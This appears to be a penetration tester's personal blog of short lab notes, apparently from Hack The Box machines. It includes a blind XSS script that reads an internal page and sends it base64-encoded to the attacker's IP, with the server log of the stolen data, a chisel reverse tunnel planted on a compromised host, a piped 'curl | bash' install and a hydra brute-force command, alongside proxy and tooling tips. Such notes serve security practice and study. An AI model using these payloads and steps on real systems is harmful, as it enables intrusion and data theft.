sobota, 13 marca 2021

Blind XSS Data Exfiltration

cat 2.js

var xhr=new XMLHttpRequest();
xhr.open("GET", 'http://gym-club..htb/security_threat/report.php', false);
xhr.send();
var xhr2=new XMLHttpRequest();
xhr2.open("GET", "http://10.10.14.121/aaaa?=" + btoa(xhr.responseText), false);
xhr2.send();


└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /2.js HTTP/1.1" 200 -
10.10.10.208 - - [13/Mar/2021 11:54:48] code 404, message File not found
10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /aaaa?=PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICA8dGl0bGU+U2VjdXJpdHkgUmVwb3J0PC90aXRsZT4KICA8c3R5bGU+CiAgICB0YWJsZSwgdGgsIHRkIHsKICAgICAgYm9yZGVyOiAxcHggc29saWQgYmxhY2s7CiAgICB9CiAgPC9zdHlsZT4KPC9oZWFkPgo8Ym9keT4KPGg0PkxvZ2dlZCBYU1MgYXR0ZW1wdHM8L2g0Pgo8dGFibGU+CiAgPHRoZWFkPgogICAgPHRyPgogICAgICA8dGQ+VGltZXN0YW1wPC90ZD4KICAgICAgPHRkPlVzZXIgQWdlbnQ8L3RkPgogICAgICA8dGQ+SVAgQWRkcmVzczwvdGQ+CiAgICA8L3RyPgogIDwvdGhlYWQ+Cjx0Ym9keT4KPC90Ym9keT4KPC9ib2R5Pgo8L2h0bWw+Cg== HTTP/1.1" 404 -

niedziela, 14 lutego 2021

New Cheatsheet XSS 2021

 https://netsec.expert/posts/xss-in-2021/

poniedziałek, 25 stycznia 2021

TCP/UDP reverse tunnel, transported over HTTP, secured via SSH - chisel

#### CHISEL INSTALL

curl https://i.jpillora.com/chisel! | bash

## copy to victim server: 
www-data@passage:/tmp$ wget http://10.10.14.143/chisel
wget http://10.10.14.143/chisel
--2021-01-25 08:55:34--  http://10.10.14.143/chisel
Connecting to 10.10.14.143:80... failed: Connection refused.
www-data@passage:/tmp$ wget http://10.10.14.143:8000/chisel
wget http://10.10.14.143:8000/chisel
--2021-01-25 08:55:47--  http://10.10.14.143:8000/chisel
Connecting to 10.10.14.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8704000 (8.3M) [application/octet-stream]
Saving to: 'chisel'

chisel              100%[===================>]   8.30M  5.33MB/s    in 1.6s    

2021-01-25 08:55:49 (5.33 MB/s) - 'chisel' saved [8704000/8704000]

www-data@passage:/tmp$ 


##  my computer:
chisel server -p 9999 --reverse

## victim computer 
./chisel client 10.10.14.143:9999 R:631:localhost:631

##############



hydra -l paul -P /usr/share/wordlists/rockyou.txt -s 631 -f 127.0.0.1 http-get /admin/log/error_log

Red Team Notes 2.0

https://dmcxblue.gitbook.io/red-team-notes-2-0/

piątek, 18 grudnia 2020

intercept http2 (grpc) in BURP SUITE PROXY

 as root:

iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d 18.159.107.117 -j REDIRECT --to-port 8080          

adduser mitmproxyuser


cat /etc/nghttpx/nghttpx.conf   (downstream config)


frontend=0.0.0.0,8080;no-tls

backend=127.0.0.1,8081;;proto=http/1.1

backend-keep-alive-timeout=5m

frontend-http2-read-timeout=5m

frontend-read-timeout=5m

frontend-write-timeout=5m

stream-read-timeout=5m

stream-write-timeout=5m

backend-read-timeout=5m

backend-write-timeout=5m

backend-connect-timeout=5m

listener-disable-timeout=5m

backend-http2-window-size=134217720

backend-http2-connection-window-size=1073741760

frontend-http2-window-size=134217720

frontend-http2-connection-window-size=1073741760

http2-proxy=no

private-key-file=/etc/nghttpx/server.key

certificate-file=/etc/nghttpx/server.crt

cacert=/etc/nghttpx/ca.crt

accesslog-syslog=yes

errorlog-syslog=yes

workers=5


cat /etc/nghttpx/upstream.conf   (upstream config)

frontend=127.0.0.1,8082;no-tls

backend=vendor-IP,28900;;no-tls;proto=h2

backend-keep-alive-timeout=5m

frontend-http2-read-timeout=5m

frontend-read-timeout=5m

frontend-write-timeout=5m

stream-read-timeout=5m

stream-write-timeout=5m

backend-read-timeout=5m

backend-write-timeout=5m

backend-connect-timeout=5m

listener-disable-timeout=5m

http2-proxy=no

accesslog-syslog=yes

errorlog-syslog=yes

workers=5


run nghttp as root:


┌──(root💀kali)-[/etc/nghttpx]

└─# nghttpx

2020-12-18T14:38:21.383+01:00 8777 8777 99aaafb4 NOTICE (shrpx.cc:2882) Loading configuration from /etc/nghttpx/nghttpx.conf


run burp suite proxy 127.0.0.1:8081 (invisible proxy)

USER OPTIONS -> Upstream proxy add 127.0.0.1:8082


as mitmproxyuser:

┌──(mitmproxyuser㉿kali)-[/etc/nghttpx]

└─$ nghttpx --conf upstream.conf

2020-12-18T14:42:00.364+01:00 9293 9293 59e630c7 NOTICE (shrpx.cc:2882) Loading configuration from upstream.conf



as root:

run python code (client http2)











Forward local connections to local BURP PROXY / MITM PROXY


0)

sysctl -w net.ipv4.ip_forward=1

sysctl -w net.ipv6.conf.all.forwarding=1

sysctl -w net.ipv4.conf.all.send_redirects=0

 1) 

iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d dst_ip -j REDIRECT --to-port 8080   

2) useradd --create-home mitmproxyuser

3) xhost +

4) sudo -u mitmproxyuser -H bash -c "export DISPLAY=:0.0;java -jar /usr/bin/burpsuite"   

or 

4) sudo -u mitmproxyuser -H bash -c "export DISPLAY=:0.0;mitmproxy"  


czwartek, 17 grudnia 2020

Virtualbox + 4k (3840x2160) resolution on guest

PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe setextradata global GUI/MaxGuestResolution "3840,2160"
PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe getextradata global GUI/MaxGuestResolution
Value: 3840,2160
PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe setextradata "Kali" GUI/LastGuestSizeHint "3840,2160"

środa, 16 września 2020

How to parse ffuf output file

ffuf -o output_file cat output_file | jq -c '.results[] | {url:.url,status: .status}' for file in dirb/*; do cat $file | jq -c '.results[] | {url:.url,status: .status}'; done